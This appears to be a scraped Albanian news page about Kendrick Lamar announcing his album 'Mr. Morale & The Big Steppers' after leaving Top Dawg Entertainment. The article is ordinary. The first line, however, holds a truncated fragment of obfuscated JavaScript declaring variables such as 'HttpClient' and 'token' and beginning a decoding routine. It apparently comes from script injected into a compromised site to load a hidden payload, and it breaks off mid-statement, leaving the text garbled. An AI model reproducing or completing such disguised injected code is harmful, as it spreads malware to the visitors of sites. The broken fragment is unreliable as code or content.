;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pas thashethemeve se po lë muzikën, reperi i njohur konfirmon albumin e ri

By

Reperi Kendrick Lamar ka njoftuar rikthimin e tij, duke zbuluar datën e albumit të tij të pestë të shumëpritur.

Ky do të jetë albumi i tij i parë në pesë vjet.

Pothuajse tetë muaj pasi njoftoi largimin e tij nga labeli i tij i gjatë Top Dawg Entertainment, artisti zbuloi albumin e tij të ardhshëm, të quajtur “Mr. Morale & The Big Steppers”, që do të publikohet më 13 maj.

Lamar, fillimisht e ndau lajmin në Twitter në përgjigjje të një postimi ku thuhej “Kendrick Lamar është zyrtarisht në pension”.

Në gusht, Lamar njoftoi planet e tij për t’u larguar nga TDE, sipas së cilës janë publikuar të gjitha albumet e tij të mëparshme. Ky do të jetë albumi i tij i fundit nën etiketën e tyre, tha ai në atë kohë.

Albumi i fundit i Lamar ishte “DAMN” i vitit 2017, një album që rezultoi jashtëzakonisht i suksesshëm për artistin.

Artikuj të ngjashëm